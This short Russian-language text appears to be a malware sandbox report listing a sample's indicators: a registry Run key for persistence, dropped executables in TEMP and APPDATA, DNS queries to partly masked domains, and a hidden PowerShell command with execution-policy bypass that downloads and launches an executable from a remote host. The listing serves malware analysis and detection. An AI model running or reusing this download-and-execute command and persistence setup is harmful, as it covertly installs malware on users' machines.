Техническая информация
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\] 'solu' = '%APPDATA%\solu\solu.exe'
- http://ho##c.org/ot/solut.exe как %temp+%\solute.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://ho##c.org/ot/solut.exe',$env:Temp+'\solute.exe');(New-Object -com Shell.Appli...
- %TEMP%\solute.exe
- %APPDATA%\solu\solu.exe
- http://ho##c.org/ot/solut.exe
- DNS ASK ho##c.org
- DNS ASK so####on.myddns.me
- '%TEMP%\solute.exe'
- '%APPDATA%\solu\solu.exe'
- '<SYSTEM32>\cmd.exe' /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://ho##c.org/ot/solut.exe',$env:Temp+'\solute.exe');(New-Object -com Shell.Appli...' (со скрытым окном)